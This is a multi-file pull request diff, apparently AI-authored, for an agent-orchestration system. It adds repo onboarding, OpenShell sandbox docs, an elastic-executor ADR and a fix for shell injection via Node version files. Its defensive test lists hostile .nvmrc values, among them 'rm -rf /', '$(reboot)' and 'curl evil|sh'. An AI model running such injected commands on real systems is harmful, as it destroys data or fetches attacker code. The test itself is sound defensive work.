+[`deploy/k8s/gpu-worker/`](../../deploy/k8s/gpu-worker/).
+
+(Method/caveat: the telemetry only captures hub-routed requests; a process hitting
+`hostb:8000` directly would not appear. Confirm with hostb's vLLM
+`/metrics request_success_total` before decommissioning the service.)
+
+## Risks / non-goals
+
+- **Do not** dissolve personas/memory/long-lived services into ephemeral workers
+  — that breaks ADR 0001's identity model and the brain/router.
+- **Secret blast radius:** a worker serving "all projects" can read all those
+  repos' secrets + TokenHub keys. Scope per project (k8s namespace + scoped
+  `MAC_API_TOKENS`).
+- **Two-scheduler hazard:** if GitHub events *also* dispatch while the ledger
+  dispatches, you get double-dispatch. One brain (the ledger).
+- **Cold-start latency:** per-task spin-up is fine for build/edit work, bad for
+  conversational turns — another reason persona ≠ ephemeral.
+- **GPU / model servers** stay persistent services; they are not jobs.
+
+## Consequences
+
+- **Pros:** elasticity (scale to work, not to a host list); clean ephemeral
+  checkouts eliminate the stale-checkout failure class; far less static config
+  and manual deploy/token drift; the ledger's rich semantics are preserved.
+- **Cons:** a real autoscaler + executor-bootstrap to build and secure; two-tier
+  topology to operate; careful secret scoping; reconciliation so the ledger and
+  the pool don't fight.
+
+## First step (pilot, reversible)
+
+1. Pick **one project** (e.g. `c26`) whose tasks are repo/CI-shaped.
+2. Stand up a small **ephemeral executor pool** (k8s Job-per-task is the shortest
+   path given autopilot already exists) labeled for that project's capability.
+3. Executor lifecycle: register → `mac task claim` a ready task for the project →
+   run in a fresh checkout → `mac task evidence` + `close` → exit. No persona, no
+   memory.
+4. Drive pool size from `GET /tasks/ready?project=c26`.
+5. Compare against the static worker: failure rate (esp. checkout-staleness),
+   latency, cost. If it wins, widen to more projects; keep personas/services on
+   the persistent tier.
+
+## Open questions
+
+- GitHub runner groups vs. k8s namespaces for per-project isolation.
+- How a persistent persona "hands off" a decomposed sub-task to an ephemeral
+  executor (ties to `kanban-adopt-01` / parent-child links) and gets results back.
+- Whether the persistent tier itself should move to k8s Deployments (retire
+  `fleets.yaml` for hosts entirely) or stay a small declared set.

--- a/docs/openshell-nemo-relay-integration.md
+++ b/docs/openshell-nemo-relay-integration.md
@@ -1,0 +1,155 @@
+# OpenShell + NeMo Relay integration
+
+This document describes how the MAC fleet runs the Hermes agent under the
+**OpenShell** sandbox (the sole guardrail authority) with **NeMo Relay** as the
+observability runtime — the plan, what is implemented today, and how to turn it
+on and verify it.
+
+## Why
+
+The task executor already launches Hermes with `--yolo` (Hermes' own
+permission/approval prompts are bypassed — see `_hermes_argv` in
+`src/mac/task_executor.py`). On its own that is **unguarded**. The goal of this
+work is to make YOLO *safe* by confining the agent inside OpenShell, which then
+enforces every guardrail from a declarative policy:
+
+| Concern | Enforced by | How |
+| --- | --- | --- |
+| Filesystem | OpenShell Landlock | allow-list of read-only / read-write paths |
+| Syscalls / privilege | OpenShell seccomp | syscall filter; never runs as root |
+| Network egress | OpenShell L7 proxy | **deny-by-default**; per-host/per-binary rules |
+| LLM credentials | OpenShell inference router | strip/inject provider creds (optional) |
+
+So instead of two competing guardrail systems (Hermes' approval prompts +
+OpenShell policy), there is exactly one: **the OpenShell policy YAML.**
+
+## Architecture
+
+```
+mac worker ──► task_executor.main()
+                  │  builds [python -m hermes_cli.main chat … --yolo]
+                  ▼
+        _maybe_wrap_openshell(argv)            (src/mac/task_executor.py)
+                  │  if MAC_OPENSHELL_SANDBOX:
+                  ▼
+   openshell sandbox create --policy P --no-auto-providers --env … -- <hermes argv>
+                  │                                   │
+        confined Hermes process              OCSF event stream (/var/log/openshell-ocsf.*.log)
+        (FS / syscalls / egress                       │
+         enforced by policy P)                         ▼
+                                          relay_observability.parse_ocsf_lines()
+                                          (src/mac/relay_observability.py)
+                                                       │  -> mac observations (layer="sandbox")
+                                                       ▼
+                                          ObservabilityService  +  NeMo Relay export
+                                                       (SQLite sink kept; OTLP/ATIF/OI added)
+```
+
+**Layering choice.** OpenShell wraps the *entire* Hermes process (not just the
+shell/code tools), so the agent's own filesystem and network actions are
+confined too — not only the commands it shells out. This is the faithful
+realization of "OpenShell provides ALL guardrails." (An alternative finer-grained
+approach — adding an `openshell` backend to Hermes' `tools/environments/`
+abstraction so only `terminal`/`execute_code`/`process` go through the sandbox —
+is tracked as follow-up; it leaves Hermes' own I/O unconfined and so is a weaker
+guarantee under YOLO.)
+
+## What is implemented today (default OFF)
+
+All of this is inert until `MAC_OPENSHELL_SANDBOX` is truthy — with it unset the
+executor behaves exactly as before (proven by `tests/test_openshell_sandbox.py`).
+
+1. **`_maybe_wrap_openshell()`** in `src/mac/task_executor.py` — a pure argv
+   transform applied at the launch seam. Wraps the Hermes invocation in
+   `openshell sandbox create … -- <argv>`.
+2. **`src/mac/relay_observability.py`** — an import-guarded NeMo Relay adapter
+   (no-op when `nemo_relay` is absent) plus a pure OpenShell **OCSF → mac
+   observation** translator (`ocsf_to_observation`, `parse_ocsf_lines`).
+3. **`deploy/openshell/mac-hermes-policy.yaml`** — the default guardrail policy
+   template (filesystem allow-list, `run_as_user: sandbox`, deny-by-default
+   network with rules for the MAC hub, model gateway, and GitHub).
+4. Unit tests for both modules; full contract suite passes.
+
+## How to enable
+
+> **Prerequisite (macOS):** OpenShell's kernel primitives (Landlock, seccomp,
+> network namespaces) run inside the **Docker Desktop Linux VM** on macOS, not
+> on the host. You must have **Docker Desktop running** and a compute driver
+> available. On Linux hosts they run natively (kernel ≥ 5.13 for Landlock).
+
+1. Install OpenShell and start its gateway:
+   ```bash
+   curl -LsSf https://raw.githubusercontent.com/NVIDIA/OpenShell/main/install.sh | sh
+   # or: uv tool install -U openshell
+   openshell status        # must report the gateway reachable
+   ```
+2. Copy and fill in the policy template — substitute every `__PLACEHOLDER__`
+   (`__AGENT_USER__`, `__MAC_HUB_HOST__`/`__MAC_HUB_PORT__`, `__MODEL_GATEWAY_HOST__`)
+   for your fleet, and make the Hermes runtime reachable inside the sandbox via a
+   prebuilt image (`--from`) or upload (see `MAC_OPENSHELL_CREATE_ARGS`):
+   ```bash
+   cp deploy/openshell/mac-hermes-policy.yaml /etc/mac/openshell-policy.yaml
+   $EDITOR /etc/mac/openshell-policy.yaml
+   ```
+3. Set the executor environment (on the worker / in the fleet agent config):
+   ```bash
+   export MAC_OPENSHELL_SANDBOX=1
+   export MAC_OPENSHELL_POLICY=/etc/mac/openshell-policy.yaml
+   # make the runtime + workspace available inside the sandbox, e.g.:
+   export MAC_OPENSHELL_CREATE_ARGS="--from my-mac-hermes-image"
+   ```
+
+### Environment knobs
+
+| Variable | Default | Meaning |
+| --- | --- | --- |
+| `MAC_OPENSHELL_SANDBOX` | _(off)_ | truthy → wrap the agent in OpenShell |
+| `MAC_OPENSHELL_BIN` | `openshell` | path to the `openshell` binary |
+| `MAC_OPENSHELL_POLICY` | _(none)_ | path to the guardrail policy YAML |
+| `MAC_OPENSHELL_SANDBOX_NAME` | _(ephemeral)_ | fixed sandbox name (debug only) |
+| `MAC_OPENSHELL_KEEP` | _(off)_ | truthy → `--keep` (don't tear down; debug) |
+| `MAC_OPENSHELL_CREATE_ARGS` | _(none)_ | extra `sandbox create` args (shell-split), e.g. `--from img`, `--upload /src:/src` |
+| `MAC_OPENSHELL_ENV_PASSTHROUGH` | hub+gateway vars | comma list of env names forwarded via `--env` |
+| `MAC_RELAY_OBSERVABILITY` | _(off)_ | truthy → emit NeMo Relay scopes/events (needs `nemo_relay`) |
+
+## Verification (requires Docker + OpenShell installed)
+
+This session could not run OpenShell end-to-end (no Docker daemon, CLI not
+installed, Python 3.14 venv). To verify on a host that has them:
+
+1. `openshell status` reports the gateway up.
+2. Dry-run the wrap without spawning:
+   ```python
+   import os; os.environ["MAC_OPENSHELL_SANDBOX"]="1"
+   os.environ["MAC_OPENSHELL_POLICY"]="/etc/mac/openshell-policy.yaml"
+   from mac import task_executor as te
+   print(te._maybe_wrap_openshell(te._hermes_argv("hello")))
+   ```
+   Confirm it begins with `openshell sandbox create … --policy … --` and ends
+   with the Hermes argv.
+3. Run one real task with `MAC_OPENSHELL_SANDBOX=1`. Confirm: the agent
+   completes; a network attempt **not** in the policy is **denied**
+   (`openshell logs <sandbox> --since 5m` shows `action=deny`); evidence is
+   written to the workspace.
+4. Enable OCSF JSONL and confirm sandbox events flow into mac observations:
+   ```bash
+   openshell settings set --global --key ocsf_json_enabled --value true
+   ```
+   then feed `/var/log/openshell-ocsf.*.log` through
+   `relay_observability.parse_ocsf_lines(...)`.
+
+## Deferred work (tracked as `mac task` tickets)
+
+- **Provision OpenShell on fleet hosts** + build a sandbox image containing the
+  Hermes runtime (`~/.mac/venv` + `~/.mac/src`) so `--from` works.
+- **Tune the policy** against the real model-gateway and hub hosts; decide
+  `landlock.compatibility: hard_requirement` for production.
+- **Wire the OCSF → observation bridge** into a running ingestion path
+  (`ObservabilityService.record_log`) and `mac observability` views.
+- **NeMo Relay phased rollout**: scopes at the request/task boundary → managed
+  tool/LLM calls → guardrail/sanitizer middleware → exporters (keep the SQLite
+  sink; add OTLP/ATIF/OpenInference). The Hermes loop-detection guardrail and
+  input sanitizers are *correctness*, not permissions — port them to Relay
+  middleware; do **not** port the dangerous-command approval layer (it is
+  disabled under YOLO because OpenShell owns permissions).
+- **End-to-end verification** on a Docker-enabled host (the steps above).

--- a/src/mac/cli.py
+++ b/src/mac/cli.py
@@ -530,6 +530,26 @@ def cmd_project_create(args: argparse.Namespace) -> None:
     )
 
 
+def cmd_project_onboard(args: argparse.Namespace) -> None:
+    # URL-only registration: derive the project name from the repo, clone a
+    # read-only worktree, and create one onboarding task that instructs a
+    # worker to read the repo's own README.md / AGENTS.md / PLAN.md (+ manifests)
+    # and author the .mac/project.yaml contract. Everything except the URL
+    # defaults — this is the "sane-defaults, just give me a repo URL" path.
+    capabilities = list(_csv(args.required_capabilities)) or None
+    _print(
+        _plane(args).onboard_repository(
+            args.repository_url,
+            project=args.project,
+            default_branch=args.default_branch,
+            title=args.title,
+            priority=args.priority,
+            required_capabilities=capabilities,
+            actor=args.actor,
+        ).to_dict()
+    )
+
+
 def cmd_project_pause(args: argparse.Namespace) -> None:
     _print(_plane(args).set_project_dispatch(args.project, paused=True, actor=args.actor))
 
@@ -2545,6 +2565,33 @@ def build_parser() -> argparse.ArgumentParser:
         help="open the project to autonomous dispatch immediately",
     )
     _set(cmd_project_create, project_create)
+    project_onboard = project.add_parser(
+        "onboard",
+        help="register a project from just a git repo URL: clone a read-only "
+        "worktree and task a worker to read the repo's own README/AGENTS/PLAN "
+        "(+ manifests) and author the .mac/project.yaml contract",
+    )
+    project_onboard.add_argument(
+        "repository_url",
+        metavar="repo-url",
+        help="https://, git@, ssh:// or git:// remote (e.g. https://github.com/org/repo.git)",
+    )
+    project_onboard.add_argument(
+        "--project",
+        help="project name to file the onboarding task under (default: derived from the repo URL)",
+    )
+    project_onboard.add_argument(
+        "--default-branch",
+        help="branch to clone for analysis (default: the remote's default branch)",
+    )
+    project_onboard.add_argument("--title", help="override the onboarding task title")
+    project_onboard.add_argument("--priority", type=int, default=0)
+    project_onboard.add_argument(
+        "--required-capabilities",
+        help="comma-separated capabilities required to claim the onboarding task",
+    )
+    project_onboard.add_argument("--actor", default="human")
+    _set(cmd_project_onboard, project_onboard)
     project_pause = project.add_parser(
         "pause", help="hold a project's tickets from autonomous dispatch"
     )

--- a/src/mac/dispatch.py
+++ b/src/mac/dispatch.py
@@ -402,6 +402,30 @@ class RemoteDispatch:
     def get_project(self, project: str) -> _Dictish:
         return _Dictish(self._get("/projects/%s" % quote(project, safe="")))
 
+    def onboard_repository(
+        self,
+        repository_url: str,
+        *,
+        project: Optional[str] = None,
+        default_branch: Optional[str] = None,
+        title: Optional[str] = None,
+        priority: int = 0,
+        required_capabilities: Optional[List[str]] = None,
+        actor: Optional[str] = None,
+    ) -> _Dictish:
+        body = _drop_none(
+            {
+                "repository_url": repository_url,
+                "project": project,
+                "default_branch": default_branch,
+                "title": title,
+                "priority": priority,
+                "required_capabilities": required_capabilities,
+                "actor": actor,
+            }
+        )
+        return _Dictish(self._post("/repositories/onboard", body))
+
     # -- Workflow decisions (wf-02) -----------------------------------------
 
     def workflow_decisions(

--- a/src/mac/services.py
+++ b/src/mac/services.py
@@ -482,11 +482,13 @@ def _build_onboarding_description(url: str, repo_name: str) -> str:
             "MAC has cloned a clean, writable checkout for you at $MAC_TASK_REPO_WORKTREE (a task branch). Work entirely there.",
             "This is READ-ONLY with respect to the remote: do NOT push or open a pull request. You MAY write local analysis files in the checkout (notably .mac/project.yaml).",
             "",
+            "Start from the repo's own self-description. Read these files first if they exist and treat them as authoritative for intent, not just for code: README.md (what it is / how to build), AGENTS.md (instructions for AI agents working here), and PLAN.md (roadmap / planned work). Fold what they say into the deliverables below; do not contradict them without explaining why.",
+            "",
             "Deliverables — report all of these in your evidence (evidence_type=investigation):",
-            "  1. A concise summary of what the project does and its architecture (languages, frameworks, key modules, entry points).",
-            "  2. How to build it and run its tests, inferred from the repo's own manifests/CI — not guessed.",
+            "  1. A concise summary of what the project does and its architecture (languages, frameworks, key modules, entry points), grounded in README.md/AGENTS.md/PLAN.md where present.",
+            "  2. How to build it and run its tests, inferred from the repo's own manifests/CI and README — not guessed.",
             "  3. An authored repository contract written to .mac/project.yaml using schema mac.repository_contract.v1 (keys: schema, project, platforms, toolchain.required_commands, bootstrap.command, test.command, evidence.required). Include its full content in the evidence.",
-            "  4. A prioritized backlog of 5-10 concrete next steps, improvements, or risks you observe.",
+            "  4. A prioritized backlog of 5-10 concrete next steps, improvements, or risks you observe. If PLAN.md exists, reconcile your backlog against it (what is already planned vs. newly surfaced).",
         ]
     )
 
@@ -1970,6 +1972,7 @@ class ControlPlane:
                     "cross_project_edges": [],
                     "bridge_item_count": 0,
                     "repository_count": 0,
+                    "repository_url": "",
                     "description": "",
                     "status": "derived",
                     "metadata": {},
@@ -1987,6 +1990,8 @@ class ControlPlane:
             metadata = record.get("metadata")
             item["metadata"] = metadata if isinstance(metadata, dict) else {}
             item["project_id"] = record.get("id")
+            if isinstance(metadata, dict) and metadata.get("repository_url"):
+                item["repository_url"] = str(metadata.get("repository_url"))
 
         for task in tasks:
             project = self._hermes_task_project_key(task)
@@ -2969,6 +2974,12 @@ class ControlPlane:
             # verification gate expects an investigation write-up, not a push.
             "evidence_type": "investigation",
         }
+        # Register a first-class project record so onboard and create converge:
+        # the repo URL becomes durable project state (surfaced by `project
+        # list`/`show`), not just task metadata. Idempotent by project name.
+        self._ensure_onboarded_project_record(
+            project, url, default_branch=default_branch, actor=actor
+        )
         resolved_title = (
             title or "Onboard %s: analyze, summarize, and author the repository contract" % repo_name
         ).strip()
@@ -2981,6 +2992,51 @@ class ControlPlane:
             metadata=metadata,
             actor=actor,
         )
+
+    def _ensure_onboarded_project_record(
+        self,
+        project: str,
+        repository_url: str,
+        *,
+        default_branch: Optional[str] = None,
+        actor: str = "human",
+    ) -> ProjectRecord:
+        """Create or augment the ``projects`` record for an onboarded repo.
+
+        New records carry ``repository_url`` (+ optional ``default_branch``) in
+        metadata and are left ACTIVE on purpose: onboarding creates a single
+        read-only analysis task that must dispatch so the repo gets analyzed.
+        (``create``'s default-paused staging is the different case of seeding a
+        backlog of work tickets.) For a pre-existing record we only *fill in* a
+        missing repository_url/default_branch and never touch its dispatch
+        state, so re-onboarding is idempotent and operator intent is preserved.
+        """
+        branch = str(default_branch).strip() if default_branch else None
+        try:
+            existing = self.get_project_record(project)
+        except NotFoundError:
+            existing = None
+        if existing is None:
+            metadata: JsonDict = {"repository_url": repository_url, "onboarding": True}
+            if branch:
+                metadata["default_branch"] = branch
+            return self.create_project(
+                project,
+                metadata=metadata,
+                actor=actor,
+                dispatch_paused=False,
+            )
+        md = ensure_json_object(existing.metadata)
+        changed = False
+        if not md.get("repository_url"):
+            md["repository_url"] = repository_url
+            changed = True
+        if branch and not md.get("default_branch"):
+            md["default_branch"] = branch
+            changed = True
+        if not changed:
+            return existing
+        return self.update_project(existing.id, metadata=md, actor=actor)
 
     def _normalize_task_execution_contract(
         self,
@@ -3647,6 +3703,17 @@ class ControlPlane:
         project_name = str(name or "").strip()
         if not project_name:
             raise ValidationError("project name is required")
+        if _ONBOARDING_REMOTE_URL_RE.match(project_name):
+            # A git URL is not a project name. Storing it as one produces a
+            # junk project (name == URL, no repo linkage, nothing cloned).
+            # Point the caller at the URL-only onboarding path instead.
+            raise ValidationError(
+                "project name looks like a git URL (%r); to register a project "
+                "from a repository URL use `mac project onboard %s` "
+                "(POST /repositories/onboard), which clones the repo and reads "
+                "its README/AGENTS/PLAN to build the project."
+                % (project_name, project_name)
+            )
         existing = self.store.query_one(
             "SELECT * FROM projects WHERE name = ?",
             (project_name,),

--- a/tests/test_gate_node_resolution.py
+++ b/tests/test_gate_node_resolution.py
@@ -1,0 +1,136 @@
+"""Tests for the opencode-build gate's per-project Node version resolution.
+
+The gate (deploy/codex-runner/mac-task-executor-opencode-build) resolves the
+Node version a JS/TS repo declares (.nvmrc / .node-version / engines.node / CI
+workflow) so the pre-push test gate runs under that toolchain instead of the
+image's baseline Node. The resolved value is interpolated into a shell that
+runs `nvm install/use`, so it MUST be strictly validated — repo content is
+semi-trusted (gate-node-version-injection-01).
+
+These tests exercise the shell helpers directly. `_validate_node_version` and
+`_resolve_node_version` are a contiguous block of pure definitions in the
+script (terminated by a sentinel comment), so we slice that block out and
+source it in bash — this avoids running the executor's top-level body. They use
+only python3/grep/tr, so they run in CI without nvm/node present.
+"""
+
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+
+import pytest
+
+GATE = (
+    Path(__file__).resolve().parents[1]
+    / "deploy"
+    / "codex-runner"
+    / "mac-task-executor-opencode-build"
+)
+
+_END_MARKER = "# --- end node-version resolution helpers"
+
+
+def _node_funcs() -> str:
+    text = GATE.read_text(encoding="utf-8")
+    start = text.index("_validate_node_version() {")
+    end = text.index(_END_MARKER)
+    block = text[start:end]
+    assert "_resolve_node_version() {" in block
+    return block
+
+
+FUNCS = _node_funcs()
+
+
+def _resolve(tmp_path: Path, files: dict) -> str:
+    for name, content in files.items():
+        p = tmp_path / name
+        p.parent.mkdir(parents=True, exist_ok=True)
+        p.write_text(content, encoding="utf-8")
+    script = FUNCS + '\n_resolve_node_version "$1"\n'
+    proc = subprocess.run(
+        ["bash", "-c", script, "_", str(tmp_path)],
+        capture_output=True,
+        text=True,
+    )
+    assert proc.returncode == 0, proc.stderr
+    return proc.stdout.strip()
+
+
+def _validate(token: str) -> str:
+    script = FUNCS + '\n_validate_node_version "$1"\n'
+    proc = subprocess.run(
+        ["bash", "-c", script, "_", token],
+        capture_output=True,
+        text=True,
+    )
+    return proc.stdout.strip()
+
+
+# -- resolution sources + precedence ----------------------------------------
+
+
+def test_resolves_nvmrc(tmp_path):
+    assert _resolve(tmp_path, {".nvmrc": "20\n"}) == "20"
+
+
+def test_resolves_nvmrc_strips_leading_v(tmp_path):
+    assert _resolve(tmp_path, {".nvmrc": "v18.17.1\n"}) == "18.17.1"
+
+
+def test_resolves_node_version_file(tmp_path):
+    assert _resolve(tmp_path, {".node-version": "16\n"}) == "16"
+
+
+def test_resolves_engines_node_dropping_range_operator(tmp_path):
+    pkg = '{"engines": {"node": ">=20.11.0"}}'
+    assert _resolve(tmp_path, {"package.json": pkg}) == "20.11.0"
+
+
+def test_resolves_ci_workflow_node_version(tmp_path):
+    wf = "jobs:\n  build:\n    steps:\n      - uses: setup-node\n        with:\n          node-version: 22\n"
+    assert _resolve(tmp_path, {".github/workflows/ci.yml": wf}) == "22"
+
+
+def test_nvmrc_wins_over_engines(tmp_path):
+    assert _resolve(
+        tmp_path,
+        {".nvmrc": "18\n", "package.json": '{"engines": {"node": "20"}}'},
+    ) == "18"
+
+
+def test_no_declaration_resolves_empty(tmp_path):
+    assert _resolve(tmp_path, {"package.json": "{}"}) == ""
+
+
+# -- security: the value reaches `nvm install/use` via the shell -------------
+
+
+@pytest.mark.parametrize(
+    "evil",
+    [
+        "20; rm -rf /",
+        "$(reboot)",
+        "`id`",
+        "20 && curl evil|sh",
+        "../../etc/passwd",
+        "lts/../../x",
+    ],
+)
+def test_malicious_nvmrc_is_rejected(tmp_path, evil):
+    # A hostile .nvmrc must never yield a token (the gate falls back to system
+    # Node); nothing with shell metacharacters may pass validation.
+    assert _resolve(tmp_path, {".nvmrc": evil + "\n"}) == ""
+
+
+def test_validate_accepts_bare_semver_and_lts():
+    assert _validate("20") == "20"
+    assert _validate("20.11") == "20.11"
+    assert _validate("20.11.1") == "20.11.1"
+    assert _validate("lts/iron") == "lts/iron"
+
+
+@pytest.mark.parametrize("bad", ["20; echo", "v20", "", "latest", "20.x", "node20"])
+def test_validate_rejects_non_semver(bad):
+    assert _validate(bad) == ""

--- a/tests/test_opencode_build_executor.py
+++ b/tests/test_opencode_build_executor.py
@@ -1072,7 +1072,7 @@ def test_resolve_node_version_finds_root_project_github_workflow(
     wf.mkdir(parents=True)
     (wf / "ci.yml").write_text("jobs:\n  build:\n    steps:\n      - uses: setup-node\n        with:\n          node-version: 20\n")
     result = _run_helper(
-        ["_resolve_node_version"],
+        ["_validate_node_version", "_resolve_node_version"],
         f'_resolve_node_version "{proj}"',
         cwd=tmp_path,
     )
@@ -1096,7 +1096,7 @@ def test_resolve_node_version_finds_subdir_project_repo_root_workflow(
     proj = repo / "dashboard"
     proj.mkdir()
     result = _run_helper(
-        ["_resolve_node_version"],
+        ["_validate_node_version", "_resolve_node_version"],
         f'_resolve_node_version "{proj}"',
         cwd=tmp_path,
     )

--- a/tests/test_repository_onboarding.py
+++ b/tests/test_repository_onboarding.py
@@ -74,3 +74,82 @@ def test_onboard_repository_description_directs_contract_authoring(cp):
     assert ".mac/project.yaml" in task.description
     assert "$MAC_TASK_REPO_WORKTREE" in task.description
     assert "do NOT push" in task.description
+
+
+def test_onboard_repository_description_reads_repo_self_description(cp):
+    # Sane-defaults onboarding must point the worker at the repo's own
+    # self-describing files, not just guess from code.
+    task = cp.onboard_repository("https://github.com/o/widget.git")
+    for self_doc in ("README.md", "AGENTS.md", "PLAN.md"):
+        assert self_doc in task.description
+
+
+# -- Gap B: onboarding registers a first-class project record ----------------
+
+
+def test_onboard_repository_creates_project_record(cp):
+    cp.onboard_repository("https://github.com/o/widget.git")
+    record = cp.get_project_record("widget")  # would raise NotFoundError pre-fix
+    assert record.metadata.get("repository_url") == "https://github.com/o/widget.git"
+    # get_project's summary must expose the repo association first-class and the
+    # record must be non-null (it was None when onboarding made only a task).
+    summary = cp.get_project("widget")
+    assert summary["record"] is not None
+    assert summary["summary"]["repository_url"] == "https://github.com/o/widget.git"
+
+
+def test_onboard_repository_record_is_active_so_task_dispatches(cp):
+    # The single onboarding task must be allowed to run; a paused project would
+    # hold it forever. Active is the whole point of onboarding.
+    cp.onboard_repository("https://github.com/o/widget.git")
+    assert cp._project_dispatch_paused("widget") is False
+
+
+def test_onboard_repository_is_idempotent(cp):
+    cp.onboard_repository("https://github.com/o/widget.git")
+    cp.onboard_repository("https://github.com/o/widget.git")
+    records = [r for r in cp.list_project_records() if r.name == "widget"]
+    assert len(records) == 1  # no duplicate project
+    assert records[0].metadata.get("repository_url") == "https://github.com/o/widget.git"
+
+
+def test_onboard_repository_records_default_branch(cp):
+    cp.onboard_repository("https://github.com/o/widget.git", default_branch="develop")
+    assert cp.get_project_record("widget").metadata.get("default_branch") == "develop"
+
+
+def test_onboard_repository_preserves_existing_paused_state(cp):
+    # A pre-existing project (operator may have paused it) must keep its
+    # dispatch state; onboarding only fills in the missing repo URL.
+    cp.create_project("widget", dispatch_paused=True)
+    cp.onboard_repository("https://github.com/o/widget.git", project="widget")
+    assert cp._project_dispatch_paused("widget") is True
+    assert (
+        cp.get_project_record("widget").metadata.get("repository_url")
+        == "https://github.com/o/widget.git"
+    )
+
+
+# -- Gap A: `project create` rejects git-URL-shaped names --------------------
+
+
+@pytest.mark.parametrize(
+    "url",
+    [
+        "https://github.com/NVIDIA-dev/ova.git",
+        "git@github.com:NVIDIA-dev/ova.git",
+        "ssh://git@github.com/NVIDIA-dev/ova.git",
+        "git://github.com/NVIDIA-dev/ova.git",
+    ],
+)
+def test_create_project_rejects_url_shaped_name(cp, url):
+    with pytest.raises(ValidationError) as exc:
+        cp.create_project(url)
+    # Error must steer the caller to the onboarding path, not just fail.
+    assert "onboard" in str(exc.value)
+    # And no junk project named after the URL should exist.
+    assert not [r for r in cp.list_project_records() if r.name == url]
+
+
+def test_create_project_allows_normal_name(cp):
+    assert cp.create_project("ova").name == "ova"


### PR DESCRIPTION
First batch of the **mac ⇄ mac-dev** fork reconciliation — the **dev→mac** direction (porting mac-dev's unique work into mac). Each block is its own commit; full contract suite green (1735 passed, 13 skipped).

## Blocks landed
- **D — Node-version injection fix [security]** (`fix(gate)`): mac's opencode-build gate piped repo-controlled `.nvmrc`/`.node-version`/`engines.node`/CI-workflow values straight into `nvm install "$want"` with no validation. Ported mac-dev's `_validate_node_version` (strict bare-semver / `lts/*` allowlist) and routed every candidate through it, preserving mac's richer parent-dir workflow search (H1). Adds `tests/test_gate_node_resolution.py` (malicious-`.nvmrc` cases).
- **C — URL-only repository onboarding** (`feat(project)`): adds `mac project onboard <repo-url>` (CLI + dispatch client), `_ensure_onboarded_project_record`, git-URL-shaped-name rejection in `create_project`, README/AGENTS/PLAN-grounded onboarding task body, and `repository_url` in the project summary. mac already had the `onboard_repository` backend — this is the missing front door + record hardening. Deliberately did **not** apply mac-dev's deletions of mac's OpenShell/action-events/personas/notification code.
- **E — k8s GPU-worker tier + ADR** (`docs,deploy`): NVIDIA device-plugin DaemonSet + node-label script, ADR 0005 (elastic executor tier), OpenShell+NeMo-Relay integration doc. Additive only.

## Deliberately deferred
- **H — `openshell_runtime` required-agent generalization**: mac-dev empties `DEFAULT_REQUIRED_AGENT_NAMES`. Applying that to mac would stop auto-requiring the real fleet (rocky/bullwinkle/natasha) — a runtime sandbox-posture change, not a clean additive port. Needs a decision + call-site wiring; tracked separately.

## Not in this PR (the mac→dev direction)
Blocks A (OpenShell + ActionEvent subsystem), F (notification guards), G (soul/memory/runtime-deps/approvals), the provisioning half of D, and the B decision (NeMo-Relay) all port **mac→mac-dev** and land in the NVIDIA-dev repo — separate effort.

🤖 Generated with [Claude Code](https://claude.com/claude-code)